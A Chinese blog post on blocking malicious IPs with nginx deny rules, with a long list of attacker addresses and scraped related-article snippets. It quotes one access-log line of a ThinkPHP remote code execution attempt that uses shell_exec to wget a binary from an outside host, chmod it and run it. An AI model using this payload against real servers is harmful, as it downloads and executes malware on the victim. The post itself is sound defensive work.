找到具有明显特征的访问记录,比如:

156.203.12.198 -[/Dec/::: +] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1"   "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞,执行参数上带的方法,达到下载指定文件然后执行的目的,由于危险性,所以 shell_exec 这类函数默认在 php.ini 是禁用的。

匹配特征找出不重复的 IP,写入文件:

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

编辑一个 nginx 配置,加入到 location 访问中:

$ cat blockips > /etc/nginx/conf.d/blockips.conf

location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

编辑 blockips.conf,行首加 "deny ",行尾加 ";"

%s/^/deny /g

%s/$/\;/g

重载 nginx,这些 IP 访问就是403:

# 宿主机模式

$ nginx -s reload

# Docker模式

$ docker-compose restart nginx

附一份恶意访问IP:

deny 156.194.121.215;

deny 156.195.107.210;

deny 156.195.39.140;

deny 156.195.45.250;

deny 156.196.146.114;

deny 156.196.17.47;

deny 156.196.229.206;

deny 156.196.6.26;

deny 156.198.62.131;

deny 156.200.245.40;

deny 156.201.18.181;

deny 156.202.190.62;

deny 156.202.251.75;

deny 156.202.76.2;

deny 156.202.84.179;

deny 156.203.12.198;

deny 156.203.210.142;

deny 156.203.244.51;

deny 156.203.7.75;

deny 156.205.251.198;

deny 156.205.81.35;

deny 156.206.136.3;

deny 156.206.182.152;

deny 156.206.187.73;

deny 156.206.231.65;

deny 156.207.242.8;

deny 156.208.42.167;

deny 156.209.137.91;

deny 156.209.40.94;

deny 156.212.251.36;

deny 156.214.142.160;

deny 156.214.43.68;

deny 156.217.6.172;

deny 156.217.9.164;

deny 156.218.133.186;

deny 156.218.246.73;

deny 156.219.214.185;

deny 156.221.182.18;

deny 156.222.20.232;

deny 157.230.121.160;

deny 167.172.104.251;

deny 192.64.86.141;

deny 197.33.213.164;

deny 197.33.38.103;

deny 197.34.0.63;

deny 197.35.49.18;

deny 197.36.233.108;

deny 197.36.33.241;

deny 197.36.4.226;

deny 197.36.60.220;

deny 197.40.152.66;

deny 197.41.192.255;

deny 197.41.76.25;

deny 197.42.153.234;

deny 197.43.203.16;

deny 197.46.143.130;

deny 197.46.88.69;

deny 197.52.120.153;

deny 197.52.86.59;

deny 197.53.154.219;

deny 197.57.10.160;

deny 197.58.107.10;

deny 197.61.10.30;

deny 197.61.18.238;

deny 197.61.62.151;

deny 197.62.106.69;

deny 197.63.152.246;

deny 41.232.65.205;

deny 41.233.204.74;

deny 41.235.104.130;

deny 41.236.148.6;

deny 41.236.3.171;

deny 41.238.205.186;

deny 41.238.34.214;

deny 41.35.143.95;

deny 41.36.168.29;

deny 41.36.196.47;

deny 41.36.20.93;

deny 41.36.221.70;

deny 41.40.31.77;

deny 41.42.219.201;

deny 41.42.59.4;

deny 41.43.34.248;

deny 41.44.120.131;

deny 41.45.98.34;

deny 41.46.62.42;

deny 41.47.75.136;

deny 80.10.22.62;

deny 95.14.156.128;
deny 156.196.181.71;

deny 156.196.191.37;

deny 156.196.197.156;

deny 156.196.3.62;

deny 156.197.229.125;

deny 156.201.133.105;

deny 156.201.98.17;

deny 156.202.112.54;

deny 156.202.152.246;

deny 156.202.31.234;

deny 156.202.39.255;

deny 156.203.54.61;

deny 156.203.96.174;

deny 156.204.165.223;

deny 156.205.169.68;

deny 156.206.214.19;

deny 156.208.49.5;

deny 156.208.51.140;

deny 156.209.187.210;

deny 156.209.35.200;

deny 156.212.44.77;

deny 156.213.35.145;

deny 156.216.156.144;

deny 156.218.136.219;

deny 156.219.45.190;

deny 156.220.186.189;

deny 156.221.230.75;

deny 156.221.8.69;

deny 182.64.156.46;

deny 197.33.205.142;

deny 197.33.214.152;

deny 197.33.99.150;

deny 197.34.177.145;

deny 197.35.113.116;

deny 197.35.85.109;

deny 197.36.186.126;

deny 197.36.19.18;

deny 197.37.180.73;

deny 197.38.244.62;

deny 197.40.184.150;

deny 197.40.238.169;

deny 197.41.112.15;

deny 197.41.178.87;

deny 197.41.86.1;

deny 197.43.220.39;

deny 197.45.9.234;

deny 197.46.71.54;

deny 197.47.108.224;

deny 197.47.221.54;

deny 197.52.165.67;

deny 197.54.42.198;

deny 197.56.28.28;

deny 197.56.59.108;

deny 197.57.167.86;

deny 197.57.219.86;

deny 197.59.221.148;

deny 197.61.186.6;

deny 197.61.85.58;

deny 197.62.227.36;

deny 197.63.13.29;

deny 197.63.205.232;

deny 41.232.17.135;

deny 41.232.27.153;

deny 41.234.133.17;

deny 41.235.102.192;

deny 41.235.244.63;

deny 41.236.223.4;

deny 41.236.56.8;

deny 41.237.33.100;

deny 41.239.135.65;

deny 41.239.77.234;

deny 41.42.35.168;

deny 41.42.59.130;

deny 41.45.30.236;

deny 41.46.236.128;

deny 41.46.255.174;
deny 141.98.80.117;

deny 141.98.80.42;

deny 185.153.196.48;

deny 185.153.198.163;

deny 185.153.199.3;

deny 185.156.177.10;

deny 193.106.31.202;

deny 193.188.22.123;

deny 193.188.22.187;
deny 193.188.22.234;

deny 193.188.22.76;

deny 193.188.23.25;
deny 39.107.142.5;

deny 41.216.186.89;

deny 45.141.86.144;

deny 46.161.27.112;

Link:https://www.cnblogs.com/farwish/p/12080630.html

使用 Nginx 阻止恶意 IP 访问的更多相关文章

  1. 服务器安全策略之《通过IP安全策略阻止某个IP访问的设置方法》

    现在我们在布署好了一个网站,发布到外网后就意味着将会接受来自四面八方的黑客攻击,这个情况很常见,我们的网站基本上每天都要接受成千上万次的攻击,有SQL注入的.有代码注入的.有CC攻击等等...而我作为 ...

  2. nginx拒绝国外IP访问

    nginx拒绝国外IP访问方法很多,比如iptables,geoip模块,域名解析等等.这些方法不会相互冲突,可以结合起来一起使用. 今天来教大家利用两个小方法解决  域名解析禁止掉海外IP访问网站. ...

  3. Nginx 拒绝指定IP访问

    来源 : http://www.ttlsa.com/nginx/nginx-deny-ip-access/   闲来无事,登陆服务器,发现有个IP不断的猜测路径.试图往服务器上传文件(木马).于是查看 ...

  4. nginx限制恶意IP处理方法

    思考了几种方案,最终考虑使用ip黑名单的方式: 处理方法: 一.nginx黑名单方式: 1.过滤日志访问API接口的IP,统计每10分钟调用超过100次的IP,直接丢进nginx的访问黑名单 2.具体 ...

  5. Nginx禁止使用ip访问,只允许使用域名访问

    Nginx虚拟主机配置,vhosts下面有很多域名的配置: [root@external-lb01 vhosts]# pwd/data/nginx/conf/vhosts [root@external ...

  6. nginx 禁止某IP访问

    首先建立下面的配置文件放在nginx的conf目录下面,命名为blocksip.conf: deny 95.105.25.181; 保存一下. 在nginx的配置文件nginx.conf中加入:inc ...

  7. Nginx禁止使用IP访问

    在nginx的访问日志中,会出现只显示IP,而不出现域名的情况,在经过尝试之后,是因为没有设置禁止IP访问导致的. 下面就是在配置文件中设置禁止IP访问,来实现日志文件中$host显示域名. vim ...

  8. Nginx 如何限定IP访问

    在nginx.conf中的server限制段中.deny IP.表示需要限制该IP不可访问.allow IP表示权该IP可以访问. 如上图.表示阻止192.168.1.122的IP的访问.那当然也可以 ...

  9. 分享:linux系统如何快速阻止恶意IP地址

    可能你想要在各种情形下阻止有人通过IP地址访问你的Linux系统.比如说,作为最终用户,你可能想要保护自己,避免已知的间谍软件或跟踪者的IP地址.或者如果你在运行P2P软件,可能想要把来自与违反P2P ...

随机推荐

  1. thinkPHP5框架路由常用知识点汇总

    一.路由的模式 普通模式(默认pathinfo,不解析路由) 'url_route_on' => false 混合模式(pathinfo+解析路由) 'url_route_on' => t ...

  2. git 学习笔记 —— 保留/丢弃当前分支修改并切换至其他分支

    笔者在本地终端进行 git 工作目录的相关处理时,遇到由于某种情况需要使用 git checkout 命令切换到其他分支的情景.此时,若已经对当前分支做了一定的修改,则直接切换分支时 git 会提示错 ...

  3. Q-learning和Sarsa的区别

    Q-learning是off-policy,而Sarsa是on-policy学习. Q-learning在更新Q table时,它只会需要Q值最大,但是不一定会选择使这个Q值最大的动作,因为选择哪个动 ...

  4. isa objc_msgSend

    https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/ObjCRuntimeGuide/Articles ...

  5. 2.Vue.js 是什么

    Vue (读音 /vjuː/,类似于 view) 是一套用于构建用户界面的渐进式框架. 与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用. Vue 的核心库只关注视图层,不仅易于上手,还便 ...

  6. Game of Cards Gym - 101128G (SG函数)

    Problem G: Game of Cards \[ Time Limit: 1 s \quad Memory Limit: 256 MiB \] 题意 题意就是给出\(n\)堆扑克牌,然后给出一个 ...

  7. EFK收集nginx日志

    准备三台centos7的服务器 两核两G的 关闭防火墙和SELinux systemctl stop firewalld setenforce 0 1.每一台都安装jdk rpm -ivh jdk-8 ...

  8. cc2530的I/O中断

    通用I/O的中断 cc2530的CPU有18个中断源,每个中断都可以分别使能和控制. 18个中断源的优先级 18个中断源分为6个组,每一组有3个中断源,中断优先级可以通过配置相应寄存器来实现 中断源的 ...

  9. 链表 | 递归删除不带头结点链表所有x元素

    王道P37 T1 : 设计一个递归算法,删除不带头结点的单链表L中所有值为x的结点. 王道上的答案绝对是错的,我自己想了一个 函数主体 LinkList* del_x(LinkList* prior, ...

  10. 一起学Makefile(一)

    make和makefile makefile文件帮助我们记录了整个项目工程的所有需要编译的文件列表,这样我们在编译时仅需要输入简单的make命令就能编译出我们期望的结果. makefile文件反映了整 ...